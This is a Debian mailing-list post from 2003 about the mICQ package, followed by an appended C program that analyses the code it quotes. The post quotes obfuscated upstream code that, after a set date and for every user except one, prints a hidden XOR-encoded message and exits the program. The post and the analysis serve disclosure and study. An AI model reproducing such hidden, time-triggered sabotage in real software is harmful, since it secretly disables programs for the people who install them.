[Ruediger, Joerg, cc'ed for your convenience since you're mentioned by name and may wish to respond]

On Thu, Feb 13, 2003 at 04:14:20PM +0100, Martin Loschwitz wrote:
> Again, this "easter egg" is debian specific - it will only occur on computers
> running Debian and using the official Debian mICQ package.

So, basically, what you're saying is that you uploaded a package to Debian that included some malicious and obfuscated code from upstream, that neither you nor your sponsor (Joerg Jaspert according to the signature on the .changes; who appears to be Ruediger's AM too) spotted.

The code in question, for those playing along at home, is (with minor reformatting to fit into 80 cols):

#if defined(__Dbn__) && __Dbn__ != -1 && !defined (EXTRAVERSION)
  if (me[0] != 'm' || me[1] != 'a' || me[2] != 'd' || me[3] != 'k'
      || me[4] != 'i' || me[5] != 's' || me[6] != 's' || me[7])
    if (time (NULL) > 1045000000)
      {
        const char *parts[] = {
          "\n\n\eX0282nZlv$qf#vpjmd#wkf#nJ@R#sb`hbdf#sqlujgfg#az",
          "#Gfajbm-#Pjm`f#wkf#Gfajbm#nbjmwbjmfq#jp#f{wqfnfoz#",
          "vm`llsfqbwjuf/#zlv$qf#bguj`fg#wl#vpf#wkf#afwwfq#rv",
          "bojwz#sb`hbdf#eqln#nj`r-lqd-#Pjnsoz#bgg#wkf#eloolt",
          "jmd#ojmf#wl#zlvq#,fw`,bsw,plvq`fp-ojpw#wl#wqb`h#pw",
          "baof#ufqpjlmp#le#nJ@R9\eX3n\ngfa#kwws9,,ttt-nj`r-lqd",
          ",gfajbm#pwbaof#nbjm\n\eX0282nWl#wqb`h#@UP#pmbspklwp/",
          "#bgg9\eX3n\ngfa#kwws9,,ttt-nj`r-lqd,gfajbm#wfpwjmd#n",
          "bjm\n\eX0282nPlvq`f#sb`hbdfp#nbz#af#qfwqjfufg#pjnjob",
          "qoz-\eX3n\n\n "
        };
        char buf[52];
        int i, j;
        for (i = 0; i < 10; i++)
          {
            for (j = 0; j < 50; j++)
              buf[j] = parts[i][j] > 30 ? parts[i][j] ^ 3 : parts[i][j];
            buf[j] = '\0';
            M_print (buf);
          }
        exit (99);
      }
#endif

Given the recent spate of exploits of upstream ftp sites and security problems with CVS, and so forth, that this has happened seems fairly concerning to me.
> In my opinion, with this step, mICQ has proven as dishonorable to be
> distributed with Debian anymore (especially since nobody knows what idea
> upstream will have as next, maybe it's a very funny 'rm -rf /'?). Thus, I
> would like to request removal of the package from distribution.

As maintainer of the package, you don't have to give any reasons for requesting its removal.

> Additionally, I suggest to consider to add this piece of software to the
> "unable to package" list[1].

On the other hand, this makes no sense at all. The package doesn't have intractable security holes, or license problems, and the bugs that've gotten us into this mess are all trivial to fix. From what I've read of his posts, the upstream author doesn't even seem particularly unreasonable in any of his demands, or even particularly more obnoxious than various other people around the place.

So anyway, as a new maintainer candidate who's apparently already passed the various checks, what are your thoughts on:

(a) avoiding packages that've been trojaned upstream entering Debian, either through a Debian maintainer or via the sponsorship system?

(b) how to best interact with upstream maintainers that can get exceedingly obnoxious?

Personally, "drop any and all packages that these could affect" seems like a pretty poor solution, both in that it loses the most functionality of all possible solutions, and in that it can only be done after the fact.

Cheers,
aj

-- 
Anthony Towns <aj@humbug.org.au> <http://azure.humbug.org.au/~aj/>
I don't speak for anyone save myself. GPG signed mail preferred.

``Dear Anthony Towns: [...] Congratulations -- you are now certified as a Red Hat Certified Engineer!''
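The obfuscation in the quoted snippet is a single-byte transform, so the hidden text can be recovered offline without running the package. The C program below is an added analysis example, not code from mICQ or from the mail above: it copies the ten string literals quoted in the mail (with "\e" written as the equivalent "\033"), reverses the XOR-with-3 step for bytes above 30, and evaluates the trigger predicate for a given Unix time and user name. The function names demix, decoded_message, trigger_fires and trigger_date_utc are assumptions; the original's `me` is taken to be the running user's name, and the `__Dbn__` build-time condition is treated as true.

```c
/* Added analysis example (not code from the mICQ project or from the mail):
 * decodes the obfuscated fragments quoted above and evaluates the trigger
 * condition. The ten literals are copied from the mail; names are assumed. */
#include <stdio.h>
#include <string.h>
#include <time.h>

/* The obfuscated fragments exactly as quoted, "\e" spelled as "\033". */
static const char *parts[] = {
    "\n\n\033X0282nZlv$qf#vpjmd#wkf#nJ@R#sb`hbdf#sqlujgfg#az",
    "#Gfajbm-#Pjm`f#wkf#Gfajbm#nbjmwbjmfq#jp#f{wqfnfoz#",
    "vm`llsfqbwjuf/#zlv$qf#bguj`fg#wl#vpf#wkf#afwwfq#rv",
    "bojwz#sb`hbdf#eqln#nj`r-lqd-#Pjnsoz#bgg#wkf#eloolt",
    "jmd#ojmf#wl#zlvq#,fw`,bsw,plvq`fp-ojpw#wl#wqb`h#pw",
    "baof#ufqpjlmp#le#nJ@R9\033X3n\ngfa#kwws9,,ttt-nj`r-lqd",
    ",gfajbm#pwbaof#nbjm\n\033X0282nWl#wqb`h#@UP#pmbspklwp/",
    "#bgg9\033X3n\ngfa#kwws9,,ttt-nj`r-lqd,gfajbm#wfpwjmd#n",
    "bjm\n\033X0282nPlvq`f#sb`hbdfp#nbz#af#qfwqjfufg#pjnjob",
    "qoz-\033X3n\n\n "
};
#define NPARTS (sizeof parts / sizeof parts[0])

/* Decode one fragment: bytes above 30 were XORed with 3, everything else
 * (newline, ESC, NUL) is literal. Unlike the original loop, which copies a
 * fixed 50 bytes from each literal, this stops at the terminator and never
 * writes past `outsz`. Returns the number of bytes written (without NUL). */
static size_t demix(const char *in, char *out, size_t outsz)
{
    size_t n = 0;
    if (outsz == 0)
        return 0;
    for (; in[n] != '\0' && n + 1 < outsz; n++)
        out[n] = (unsigned char)in[n] > 30 ? (char)(in[n] ^ 3) : in[n];
    out[n] = '\0';
    return n;
}

/* Decode all fragments into one static buffer and return it. The result
 * still contains the ANSI colour sequences ("\033[31;1m" and "\033[0m"). */
static const char *decoded_message(void)
{
    static char msg[NPARTS * 51 + 1];
    size_t used = 0;
    for (size_t i = 0; i < NPARTS; i++)
        used += demix(parts[i], msg + used, sizeof msg - used);
    return msg;
}

/* The predicate guarding the payload: any user other than "madkiss",
 * after Unix time 1045000000. `user` stands in for the original's `me`
 * (assumed to be the running user's name). */
static int trigger_fires(time_t now, const char *user)
{
    return strcmp(user, "madkiss") != 0 && now > 1045000000;
}

/* Render the trigger timestamp as a UTC date so the activation window can
 * be related to the package's upload and the date of the mail. */
static int trigger_date_utc(time_t t, char *buf, size_t n)
{
    struct tm *utc = gmtime(&t);
    if (utc == NULL)
        return 0;
    return strftime(buf, n, "%Y-%m-%d %H:%M:%S UTC", utc) != 0;
}

int main(void)
{
    char date[40];
    if (trigger_date_utc(1045000000, date, sizeof date))
        printf("payload activates after: %s\n", date);
    printf("fires for 'root' now: %d\n", trigger_fires(time(NULL), "root"));
    printf("decoded text:%s\n", decoded_message());
    return 0;
}
```

The decoded text is the message the original prints before calling exit (99); the decoder reproduces the byte transform faithfully (a trailing space, for instance, becomes '#' just as it would in the original). One difference worth noting when reading the quoted code: the last literal is only eleven bytes long, yet the original copies 50 bytes from every entry, so it reads past the end of that string; the decoder here stops at the terminator instead.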